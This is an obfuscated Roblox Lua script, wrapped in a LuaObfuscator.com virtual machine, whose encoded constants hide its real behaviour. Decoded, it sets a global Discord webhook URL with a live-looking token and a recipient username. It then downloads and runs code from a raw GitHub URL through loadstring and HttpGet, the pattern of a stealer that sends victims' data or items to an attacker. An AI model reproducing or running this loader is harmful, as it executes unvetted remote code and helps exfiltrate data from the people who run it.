--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v67=v2(v0(v30,16));if v19 then local v74=v5(v67,v19);v19=nil;return v74;else return v67;end end end);local function v20(v31,v32,v33)if v33 then local v68=0 -0 ;local v69;while true do if (v68==(0 -(1065 -(68 + 997)))) then v69=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-((810 -241) -(367 + 201)))) + (928 -(214 + 713)))) ;return v69-(v69%((4 -3) + 0)) ;end end else local v70=(1 + 1)^(v32-(878 -((399 -(32 + 85)) + 595))) ;return (((v31%(v70 + v70))>=v70) and (1638 -(1523 + 114))) or (0 + 0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -(892 + 65)) ;return (v36 * 256) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (7 -4) );v18=v18 + 4 ;return (v40 * (31011612 -14234396)) + (v39 * ((120492 -(67 + 113)) -54776)) + (v38 * (606 -(87 + 263))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1 + 0 ;local v44=(v20(v42,2 -1 ,15 + 5 ) * (((16 -9) -5)^((1869 -(261 + 624)) -(802 + 150)))) + v41 ;local v45=v20(v42,56 -35 ,119 -88 );local v46=((v20(v42,474 -(416 + 26) )==(3 -2)) and  -(1 -0)) or (1 -0) ;if (v45==(0 + 0)) then if (v44==(430 -(44 + (685 -299)))) then return v46 * (997 -(50 + 865 + 82)) ;else local v75=0 -0 ;while true do if (v75==(0 + 0)) then v45=(1 + 0) -(1080 -(1020 + 60)) ;v43=1187 -(1069 + 118) ;break;end end end elseif (v45==(3185 -(116 + 1022))) then return ((v44==(0 -0)) and (v46 * ((1 + 0)/((1423 -(630 + 793)) -0)))) or (v46 * NaN) ;end return v8(v46,v45-(2237 -1214) ) * (v43 + (v44/(((3 -2) + 1)^(92 -40)))) ;end local function v25(v47)local v48=0 -(0 + 0) ;local v49;local v50;while true do if (v48==(2 + 1)) then return v6(v50);end if (v48==((0 + 0) -0)) then v49=nil;if  not v47 then v47=v23();if (v47==(1747 -(760 + 987))) then return "";end end v48=1914 -(1789 + 124) ;end if (v48==(768 -(745 + (1076 -(87 + 968))))) then v50={};for v76=1, #v49 do v50[v76]=v2(v1(v3(v49,v76,v76)));end v48=3;end if (v48==(1 + 0)) then v49=v3(v16,v18,(v18 + v47) -((8 -6) -1) );v18=v18 + v47 ;v48=7 -5 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51~=0) then else v52=0;v53=nil;v51=1;end if (v51~=(1 + 1)) then else v56=nil;v57=nil;v51=3;end if (v51==(4 -1)) then v58=nil;v59=nil;v51=6 -2 ;end if (v51==(1388 -(746 + 638))) then while true do if (v52==1) then local v94=0;while true do if (1~=v94) then else v52=1 + 1 ;break;end if (v94==(977 -(553 + 424))) then v55=nil;v56=nil;v94=1;end end end if (v52==(3 -1)) then local v95=0 + 0 ;local v96;while true do if (v95~=(0 -0)) then else v96=0;while true do if (v96==0) then v57=nil;v58=nil;v96=1 + 0 ;end if (v96==1) then v52=2 + 1 ;break;end end break;end end end if (0==v52) then local v97=341 -(218 + 123) ;while true do if (v97~=1) then else v52=1 + 0 ;break;end if (v97==(0 -0)) then v53=0;v54=nil;v97=1582 -(1535 + 46) ;end end end if (v52==3) then v59=nil;while true do local v98=0;local v99;local v100;while true do if (v98==1) then while true do if ((0 + 0)==v99) then v100=0;while true do if (v100~=0) then else local v119=0;while true do if (v119==(1 + 0)) then v100=561 -(306 + 254) ;break;end if (v119==(0 -0)) then if (v53==(1 + 0)) then local v188=0 -0 ;local v189;while true do if (v188==(1467 -(899 + 568))) then v189=0 + 0 ;while true do if ((0 -0)==v189) then v57={v54,v55,nil,v56};v58=v23();v189=1330 -(797 + 532) ;end if (v189==1) then v59={};v53=574 -(426 + 146) ;break;end end break;end end end if (v53==2) then local v190=0 + 0 ;local v191;while true do if (v190~=(1456 -(282 + 1174))) then else v191=811 -(569 + 242) ;while true do if ((1202 -(373 + 829))~=v191) then else for v196=1,v58 do local v197=0 -0 ;local v198;local v199;local v200;while true do if (v197~=(0 + 0)) then else v198=1024 -(706 + 318) ;v199=nil;v197=1252 -(721 + 530) ;end if (v197~=1) then else v200=nil;while true do if (v198==(1272 -(945 + 326))) then if (v199==(1 -0)) then v200=v21()~=0 ;elseif (v199==(4 -2)) then v200=v24();elseif (v199==(3 + 0)) then v200=v25();end v59[v196]=v200;break;end if ((0 -0)~=v198) then else local v208=700 -(271 + 429) ;while true do if (v208==(217 -(42 + 174))) then v198=1 + 0 ;break;end if (v208==(1500 -(1408 + 92))) then v199=v21();v200=nil;v208=1 + 0 ;end end end end break;end end end v57[3]=v21();v191=1087 -(461 + 625) ;end if (v191==(1581 -(1183 + 397))) then for v201=2 -1 ,v23() do local v202=1288 -(993 + 295) ;local v203;local v204;while true do if ((1 + 0)~=v202) then else while true do if (v203~=(1171 -(418 + 753))) then else v204=v21();if (v20(v204,1 + 0 ,1)==(0 + 0)) then local v209=1975 -(1913 + 62) ;local v210;local v211;local v212;local v213;while true do if (v209==(1 + 1)) then while true do if (v210==(5 -3)) then local v215=0 + 0 ;while true do if (v215~=(529 -(406 + 123))) then else if (v20(v212,1770 -(1749 + 20) ,1 + 0 )~=1) then else v213[1663 -(1477 + 184) ]=v59[v213[2]];end if (v20(v212,2,1324 -(1249 + 73) )~=(1 + 0)) then else v213[859 -(564 + 292) ]=v59[v213[3]];end v215=1 -0 ;end if (v215==(1 + 0)) then v210=8 -5 ;break;end end end if (v210==(307 -(244 + 60))) then if (v20(v212,1148 -(466 + 679) ,6 -3 )==(2 -1)) then v213[1904 -(106 + 1794) ]=v59[v213[2 + 2 ]];end v54[v201]=v213;break;end if (v210==(1 + 0)) then local v217=0;while true do if (v217==0) then v213={v22(),v22(),nil,nil};if (v211==(114 -(4 + 110))) then local v225=584 -(57 + 527) ;while true do if (v225==(0 + 0)) then v213[1430 -(41 + 1386) ]=v22();v213[3 + 1 ]=v22();break;end end elseif (v211==(104 -(17 + 86))) then v213[270 -(176 + 91) ]=v23();elseif (v211==(2 + 0)) then v213[3]=v23() -((3 -1)^(46 -30)) ;elseif (v211~=3) then else local v230=166 -(122 + 44) ;local v231;local v232;while true do if (v230~=(0 -0)) then else v231=0 -0 ;v232=nil;v230=1;end if ((1093 -(975 + 117))==v230) then while true do if (v231==0) then v232=0;while true do if (v232==(1875 -(157 + 1718))) then v213[3]=v23() -(2^(52 -36)) ;v213[4 + 0 ]=v22();break;end end break;end end break;end end end v217=1 + 0 ;end if (v217~=(1 -0)) then else v210=2;break;end end end if (v210==(65 -(30 + 35))) then local v218=0 + 0 ;while true do if (v218~=(1258 -(1043 + 214))) then else v210=3 -2 ;break;end if (v218==(1212 -(323 + 889))) then v211=v20(v204,3 -1 ,6 -3 );v212=v20(v204,4,15 -9 );v218=1 + 0 ;end end end end break;end if (v209==1) then local v214=580 -(361 + 219) ;while true do if ((321 -(53 + 267))~=v214) then else v209=1 + 1 ;break;end if (v214==(413 -(15 + 398))) then v212=nil;v213=nil;v214=983 -(18 + 964) ;end end end if (v209==(0 -0)) then v210=0;v211=nil;v209=1;end end end break;end end break;end if (v202==(0 + 0)) then v203=0;v204=nil;v202=1 + 0 ;end end end v53=1192 -(449 + 740) ;break;end end break;end end end v119=1;end end end if (v100~=1) then else if (v53==(850 -(20 + 830))) then local v177=872 -(826 + 46) ;local v178;local v179;while true do if (v177==(1 + 0)) then while true do if (0~=v178) then else v179=0;while true do if (v179==(127 -(116 + 10))) then v56={};v53=1 + 0 ;break;end if (v179==(947 -(245 + 702))) then local v194=0 -0 ;while true do if (v194==(738 -(542 + 196))) then v54={};v55={};v194=1 -0 ;end if (v194==(1899 -(260 + 1638))) then v179=1;break;end end end end break;end end break;end if (v177~=(0 + 0)) then else v178=440 -(382 + 58) ;v179=nil;v177=3 -2 ;end end end if (v53==3) then local v180=0 + 0 ;local v181;while true do if (v180~=(0 + 0)) then else v181=0 -0 ;while true do if ((0 -0)~=v181) then else local v192=0;while true do if (v192~=(0 -0)) then else local v195=1205 -(902 + 303) ;while true do if (v195==0) then for v205=1552 -(1126 + 425) ,v23() do v55[v205-(406 -(118 + 287)) ]=v28();end return v57;end end end end end end break;end end end break;end end break;end end break;end if (v98==(0 -0)) then v99=0 -0 ;v100=nil;v98=1122 -(118 + 1003) ;end end end break;end end break;end if (v51==(1691 -(1121 + 569))) then v54=nil;v55=nil;v51=216 -(22 + 192) ;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (1==v63) then v66=v60[3];return function(...)local v78=v64;local v79=v65;local v80=v66;local v81=v27;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v92=0,v86 do if (v92>=v80) then v84[v92-v80 ]=v85[v92 + 1 ];else v88[v92]=v85[v92 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do local v93=0;while true do if (1==v93) then if (v91<=5) then if (v91<=2) then if (v91<=0) then local v107=0;while true do if (v107==2) then v88[v90[2]][v90[3]]=v90[4];v82=v82 + 1 ;v90=v78[v82];v107=3;end if (v107==1) then v88[v90[2]]=v62[v90[3]];v82=v82 + 1 ;v90=v78[v82];v107=2;end if (v107==0) then v88[v90[2]][v90[3]]=v90[4];v82=v82 + 1 ;v90=v78[v82];v107=1;end if (v107==4) then v82=v90[3];break;end if (v107==3) then v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v107=4;end end elseif (v91>1) then v82=v90[3];else v88[v90[2]]=v90[3];end elseif (v91<=3) then local v108=v90[2];local v109=v88[v90[3]];v88[v108 + 1 ]=v109;v88[v108]=v109[v90[4]];elseif (v91>4) then local v123=v90[2];local v124,v125=v81(v88[v123](v13(v88,v123 + 1 ,v90[3])));v83=(v125 + v123) -1 ;local v126=0;for v147=v123,v83 do v126=v126 + 1 ;v88[v147]=v124[v126];end elseif (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end elseif (v91<=8) then if (v91<=6) then local v113=0;local v114;local v115;local v116;local v117;local v118;while true do if (v113==9) then v88[v90[2]]();v82=v82 + 1 ;v90=v78[v82];v82=v90[3];break;end if (v113==4) then v88[v118]=v117[v90[4]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v113=5;end if (v113==7) then v114=0;for v183=v118,v83 do v114=v114 + 1 ;v88[v183]=v115[v114];end v82=v82 + 1 ;v90=v78[v82];v113=8;end if (v113==0) then v114=nil;v115,v116=nil;v117=nil;v118=nil;v113=1;end if (v113==5) then v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3]~=0 ;v82=v82 + 1 ;v113=6;end if (v113==3) then v90=v78[v82];v118=v90[2];v117=v88[v90[3]];v88[v118 + 1 ]=v117;v113=4;end if (v113==1) then v88[v90[2]][v90[3]]=v90[4];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v62[v90[3]];v113=2;end if (v113==2) then v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v62[v90[3]];v82=v82 + 1 ;v113=3;end if (v113==6) then v90=v78[v82];v118=v90[2];v115,v116=v81(v88[v118](v13(v88,v118 + 1 ,v90[3])));v83=(v116 + v118) -1 ;v113=7;end if (v113==8) then v118=v90[2];v88[v118]=v88[v118](v13(v88,v118 + 1 ,v83));v82=v82 + 1 ;v90=v78[v82];v113=9;end end elseif (v91>7) then v88[v90[2]]=v90[3]~=0 ;else v88[v90[2]][v90[3]]=v90[4];end elseif (v91<=10) then if (v91==9) then do return;end else v88[v90[2]]();end elseif (v91==11) then local v130=0;local v131;while true do if (v130==0) then v131=v90[2];v88[v131]=v88[v131](v13(v88,v131 + 1 ,v83));break;end end else v88[v90[2]]=v62[v90[3]];end v82=v82 + 1 ;break;end if (v93==0) then v90=v78[v82];v91=v90[1];v93=1;end end end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31303937302O323038333938363335383336322F643168757A30785131726C494E6139514F677139586D3664753749516749686E5A6354566C662O6D634F74654C52612D512O474C494D694F476179765A526F6773546F51030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C79706865725363726970747303083O00557365724E616D65030C3O00646576696C677965322O303303093O00557365724E616D653200173O0012013O00013O0026043O000E000100020004023O000E000100120C000100033O00300600010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O001600010026043O0001000100010004023O0001000100120C000100033O00302O0001000A000B00122O000100033O00302O0001000C000B00124O00023O00044O000100012O00093O00017O00",v9(),...);end
